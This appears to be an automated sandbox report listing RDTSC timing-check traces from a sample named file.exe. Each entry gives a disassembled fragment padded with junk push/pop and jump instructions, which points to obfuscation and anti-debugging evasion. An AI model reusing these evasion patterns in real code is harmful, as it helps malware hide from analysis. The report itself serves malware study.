Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1091BED second address: 1091C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F7014CC2CC8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1091C0F second address: 1091C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F70146AC606h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1091C1E second address: 1091C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109FA88 second address: 109FAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F70146AC614h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A7116 second address: 10A711E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A711E second address: 10A7124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A7124 second address: 10A7136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBBh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A72B4 second address: 10A72B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A72B8 second address: 10A72BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A82F9 second address: 10A82FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ACCB1 second address: 10ACCCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBCh 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F7014CC2CB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF8CF second address: 10AF920 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F70146AC606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F70146AC616h 0x00000012 js 00007F70146AC606h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F70146AC60Eh 0x00000022 pushad 0x00000023 popad 0x00000024 jnc 00007F70146AC606h 0x0000002a jnl 00007F70146AC616h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF920 second address: 10AF930 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7014CC2CC2h 0x00000008 jnl 00007F7014CC2CB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B2CE8 second address: 10B2CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B50F5 second address: 10B5107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBDh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10BC450 second address: 10BC463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F70146AC60Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10BC463 second address: 10BC46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10BC46F second address: 10BC48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F70146AC615h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C5720 second address: 10C573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C573B second address: 10C5748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C5748 second address: 10C574C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C0D98 second address: 10C0D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C0D9E second address: 10C0DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10D21CB second address: 10D21D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10D22E7 second address: 10D22EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10D22EF second address: 10D22FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7014CC2CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6E4A second address: 10E6E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7139 second address: 10E714B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7014CC2CBBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7A2B second address: 10E7A4A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F70146AC606h 0x00000008 jmp 00007F70146AC60Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F70146AC606h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7A4A second address: 10E7A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7A4E second address: 10E7A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7A54 second address: 10E7A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007F7014CC2CE0h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7A6D second address: 10E7A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EBDFC second address: 10EBE11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F7014CC2CB6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC0AD second address: 10EC0CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F70146AC627h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC0CD second address: 10EC144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F7014CC2CB8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000004h 0x00000026 pushad 0x00000027 pushad 0x00000028 adc al, 0000004Ah 0x0000002b mov ax, 9344h 0x0000002f popad 0x00000030 mov dword ptr [ebp+122D1C2Dh], eax 0x00000036 popad 0x00000037 call 00007F7014CC2CB9h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7014CC2CC8h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC144 second address: 10EC16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70146AC60Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC16D second address: 10EC192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC192 second address: 10EC198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC198 second address: 10EC1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC1AD second address: 10EC1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC1B1 second address: 10EC1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F7014CC2CC1h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC48C second address: 10EC492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EC492 second address: 10EC498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2027C second address: 4D202C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F70146AC60Bh 0x0000000b xor ah, 0000002Eh 0x0000000e jmp 00007F70146AC619h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F70146AC613h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D202C5 second address: 4D202CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D202CB second address: 4D202D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D202D1 second address: 4D20326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ebx, 6B6B3D20h 0x00000013 pop edi 0x00000014 call 00007F7014CC2CC6h 0x00000019 mov ax, B781h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7014CC2CC8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20326 second address: 4D2032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20383 second address: 4D2039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2039C second address: 4D203A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D203A2 second address: 4D203C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7014CC2CBFh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D203C4 second address: 4D203CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D203CA second address: 4D203CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D203CF second address: 4D203F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 62DDC4D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70146AC617h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10025D6 second address: 10025DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2044E second address: 4D20453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2049E second address: 4D204A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204A2 second address: 4D204A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204A8 second address: 4D204AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204AE second address: 4D204B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204B2 second address: 4D204DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 71C0FB3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204DC second address: 4D204E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204E2 second address: 4D204FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F7084D967B8h 0x0000000e push 74DF27D0h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [74E80140h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204FB second address: 4D204FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D204FF second address: 4D20505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20505 second address: 4D2051D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, D178h 0x00000013 mov dx, 8D24h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2051D second address: 4D20590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7014CC2CC8h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [ebp+0Ch] 0x00000011 jmp 00007F7014CC2CC7h 0x00000016 mov esi, edx 0x00000018 jmp 00007F7014CC2CC6h 0x0000001d mov al, byte ptr [edx] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edi, cx 0x00000025 call 00007F7014CC2CC6h 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20590 second address: 4D20596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20596 second address: 4D205A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D205A5 second address: 4D205A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D205A9 second address: 4D205C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D205C4 second address: 4D20590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 88h 0x00000005 pushfd 0x00000006 jmp 00007F70146AC610h 0x0000000b xor esi, 13F02488h 0x00000011 jmp 00007F70146AC60Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c pushad 0x0000001d mov ax, 321Bh 0x00000021 movzx esi, dx 0x00000024 popad 0x00000025 jne 00007F70146AC576h 0x0000002b mov al, byte ptr [edx] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edi, cx 0x00000033 call 00007F70146AC616h 0x00000038 pop eax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20606 second address: 4D2060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2060A second address: 4D20610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20610 second address: 4D2061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2061E second address: 4D20650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edx, esi 0x0000000a jmp 00007F70146AC60Ch 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70146AC617h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20650 second address: 4D20655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20655 second address: 4D2069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a jmp 00007F70146AC611h 0x0000000f lea ebx, dword ptr [edi+01h] 0x00000012 pushad 0x00000013 mov eax, 2D026533h 0x00000018 call 00007F70146AC618h 0x0000001d mov ebx, ecx 0x0000001f pop eax 0x00000020 popad 0x00000021 mov al, byte ptr [edi+01h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2069E second address: 4D206A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D206A2 second address: 4D206A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D206A6 second address: 4D206AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D206AC second address: 4D206EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007F70146AC60Eh 0x0000000f test al, al 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70146AC617h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D206EB second address: 4D20732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7014CC2CBFh 0x00000009 sub ax, 29BEh 0x0000000e jmp 00007F7014CC2CC9h 0x00000013 popfd 0x00000014 mov ax, 8B07h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007F7084D8B011h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov ecx, edx 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20732 second address: 4D2077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b pushad 0x0000000c call 00007F70146AC60Eh 0x00000011 mov dx, ax 0x00000014 pop esi 0x00000015 jmp 00007F70146AC617h 0x0000001a popad 0x0000001b shr ecx, 02h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2077A second address: 4D2077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2077E second address: 4D20784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
